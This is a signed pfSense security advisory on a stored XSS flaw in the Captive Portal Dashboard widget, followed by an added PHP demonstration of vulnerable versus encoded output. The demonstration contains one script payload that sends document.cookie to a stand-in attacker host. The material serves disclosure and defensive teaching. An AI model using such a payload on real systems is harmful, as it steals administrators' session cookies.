-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
pfSense-SA-26_05.webgui                                     Security Advisory
                                                                      pfSense

Topic:          Stored XSS in Captive Portal Dashboard widget

Category:       pfSense Base System and Captive Portal
Module:         webgui
Announced:      2026-04-29
Credits:        Ivan Lepies
Affects:        pfSense Plus software versions <= 26.03
                pfSense CE software versions <= 2.8.1
Corrected:      2026-04-07 18:23:14 UTC (pfSense Plus master, 26.07)
                2026-04-07 18:23:14 UTC (pfSense CE master, 2.9.0)

0.   Revision History

v1.0  2026-04-29  Initial SA draft

I.   Background

pfSense® software is a free network firewall distribution based on the
FreeBSD operating system. The pfSense software distribution includes
third-party free software packages for additional functionality, and
provides most of the functionality of common commercial firewalls.

pfSense® Plus is the productized version of pfSense software from Netgate®,
previously referred to as pfSense Factory Edition (FE). It is available to
Netgate appliance and CSP customers.

The majority of users of pfSense software have never installed or used a
stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions,
there is no need for any UNIX knowledge. The command line is never used, and
there is no need to ever manually edit any rule sets. Instead, pfSense
software includes a web interface for the configuration of all included
components. Users familiar with commercial firewalls will quickly understand
the web interface, while those unfamiliar with commercial-grade firewalls may
encounter a short learning curve.

II.  Problem Description

A stored Cross-Site Scripting (XSS) vulnerability was identified in
captive_portal_status.widget.php, a component of the pfSense Plus and
pfSense CE software GUI, when used with Captive Portal configured for
unauthenticated access.
A malicious client on a local network connected to an interface with the
Captive Portal service active and configured with an authentication type of
"None" can submit a specially-crafted username containing an XSS payload in
the auth_user parameter. Because the Captive Portal is not configured for
authentication in this case, it treats the username as irrelevant and does
not validate it, but it still accepts and stores the value supplied by the
client. The Captive Portal Dashboard widget then displays the stored username
without HTML encoding for as long as the client remains connected through the
Captive Portal.

This problem is present on pfSense Plus version 26.03, pfSense CE version
2.8.1, and earlier versions of both.

III. Impact

Due to the lack of validation and encoding of the username contents, the
captive_portal_status.widget.php Dashboard widget is susceptible to stored
XSS when used with Captive Portal configured for unauthenticated access.
Arbitrary JavaScript could be executed in the browser of any GUI user who
views the Dashboard while the malicious client's session is active; the
Dashboard is the default page after GUI login, so no action beyond logging in
is required to trigger it. The script runs with that user's GUI privileges,
and the user's session cookie or other information from the session may be
compromised.

This does not affect the Captive Portal Status page, nor does it affect
Captive Portal configurations that use any other authentication type.

IV.  Workaround

To help mitigate the problem on older releases, use one or more of the
following:

* Remove the Captive Portal widget from the Dashboard
* Configure Captive Portal to use some form of authentication
* Do not log into the firewall with the same browser used for
  non-administrative web browsing.

The first two items remove the injection or rendering path entirely; the
third only limits what a script that does run can reach outside the firewall
GUI session and does not prevent it from executing.

V.   Solution

Users can upgrade to pfSense Plus software version 26.07 or later, or to
pfSense CE software versions after 2.8.1 when available. This upgrade may be
performed in the web interface or from the console.
See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html

Users on pfSense Plus versions 26.03 or 25.11.1, and pfSense CE version
2.8.1, may apply the fix from the recommended patches list in the System
Patches package after installing or updating the System Patches package.

Users may also manually apply the relevant revisions using the System
Patches package on earlier versions, or by manually making similar changes
to the affected files if the patches do not apply directly. Visit the Redmine
issue URL in the References section to obtain the patch content.

See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html

VI.  Correction details

The following list contains the correction revision commit ID for each
affected item.

Branch/path                                                      Revision
- - -------------------------------------------------------------------------
plus/plus-master                         1519891f7636e8e2f7d13d051dc53a6c30366668
pfSense/master                           1519891f7636e8e2f7d13d051dc53a6c30366668
- - -------------------------------------------------------------------------

VII. References

The latest revision of this advisory is available at

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmnyLMMACgkQE7mH/ZIU
+NrtDQ/+MqqKijd+TF9g8ndI2QQs9WzipLIaAIAkZP8GIRJuqbBhskJrmrY5uhi1
f/AuEF14sWdJtCptC7ZZ0ybdZcngISXoO7s/kixFySTOuLPgdcNjghlxbICHy8Gz
Il8nAa6VnjNYAkZJxq8oqbumBywERo66o7fxcHc9iJ51vYFByVGLvZSC4fojkbgM
0U17b1Vi5I+6aEGnZwJiAoiVdQScnwMo0fZNlQoo3aUOgFItB6HmDh+MEz682hsb
PTNcNDCNYFt9OIbI4l0yDlpIlPtgLGWRsz6yVJ72ZixqUV6vseWUYCoOyaXhkybU
LFXZ4wOklCgBUPuV+baOtk3grRot/N+z7inwh2q9KB4f32NUMpMFW1CGKWmlgkxq
LSm0a+x9z6CDk7PRR+cZtvgrrHSst8i6b/5bJh5ZbTMhAW5VoDQ14wPr7T7eJEaM
QMIXj1I7k/bOKLil/PNcf6jKPZ/CMhgLZPsyfvtjw2jxwclh0t3koWch1T99Trrm
G54KKp537NV0zCIvPrIX8B6fUyCvdK2nXYBIn2NnU29NVjEFV5GDn5nljxZEm5TI
2O+KNMirjhSKGlzQJJ4Nol8LO9JphAPhqsh8kx8wBwOzPFI1bLawGkYHC8Hn/V8s
G2to/w4x3d/amAIYnzu6bMt9A23YQYJX2lK5tk/x0ivABPQk2l4=
=uGPS
-----END PGP SIGNATURE-----
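Worked example of the mechanism in sections II and III, placed after the signed advisory text so it is not mistaken for part of it. This is added illustration code, not pfSense's widget code and not the content of commit 1519891f; all function and variable names (cp_store_session, cp_widget_row_vulnerable, cp_widget_row_hardened, cp_html) and the sample sessions are constructed for the example. It models only the storage and rendering steps: a zone with authentication type "None" records whatever arrives as auth_user, and the widget later emits that value into HTML. The hardened variant uses htmlspecialchars, the standard PHP output-encoding call, as the assumed fix shape.

```php
<?php
declare(strict_types=1);

// Added example (not pfSense code). Names and sample data are hypothetical.

// Stand-in for the portal's session store. With $authMethod === 'none' the
// username is never checked against anything, only recorded.
function cp_store_session(array &$sessions, string $ip, string $authMethod, string $authUser): void
{
    if ($authMethod === 'none') {
        $sessions[] = ['ip' => $ip, 'username' => $authUser];
        return;
    }
    // Stand-in for an authenticating backend: only a known local user is
    // admitted, so an arbitrary payload never reaches the store.
    $knownUsers = ['alice'];
    if (in_array($authUser, $knownUsers, true)) {
        $sessions[] = ['ip' => $ip, 'username' => $authUser];
    }
}

// Vulnerable rendering: the stored username is concatenated into the widget's
// HTML without encoding, so any markup in it becomes part of the page.
function cp_widget_row_vulnerable(array $session): string
{
    return '<tr><td>' . $session['ip'] . '</td><td>' . $session['username'] . "</td></tr>\n";
}

// Hardened rendering: every client-supplied value is encoded for the HTML
// text context before it is emitted. ENT_QUOTES also covers attribute values;
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the output.
function cp_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function cp_widget_row_hardened(array $session): string
{
    return '<tr><td>' . cp_html($session['ip']) . '</td><td>' . cp_html($session['username']) . "</td></tr>\n";
}

// Constructed sample input: one ordinary client and one whose "username" is a
// script payload of the kind the advisory describes (attacker.invalid is a
// reserved, non-resolving name).
$payload = '<script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>';

$sessions = [];
cp_store_session($sessions, '192.0.2.10', 'none', 'guest-laptop');
cp_store_session($sessions, '192.0.2.23', 'none', $payload);
// The same payload against an authenticating zone is rejected before storage,
// which is why the advisory limits the issue to unauthenticated portals.
cp_store_session($sessions, '192.0.2.24', 'local', $payload);

echo 'Stored sessions: ' . count($sessions) . "\n\n";

echo "Vulnerable widget output (script tag survives intact):\n";
foreach ($sessions as $s) {
    echo cp_widget_row_vulnerable($s);
}

echo "\nHardened widget output (payload rendered as inert text):\n";
foreach ($sessions as $s) {
    echo cp_widget_row_hardened($s);
}
```

Run with `php example.php`. Two sessions are stored (the 'local' attempt is dropped); the vulnerable rows contain a literal `<script>` element, while the hardened rows show it as `&lt;script&gt;...&lt;/script&gt;`. The practitioner's check on a live system is the same idea: view the Dashboard's page source for the widget table and confirm that any client-originated value, whether or not the portal considered it meaningful, appears entity-encoded.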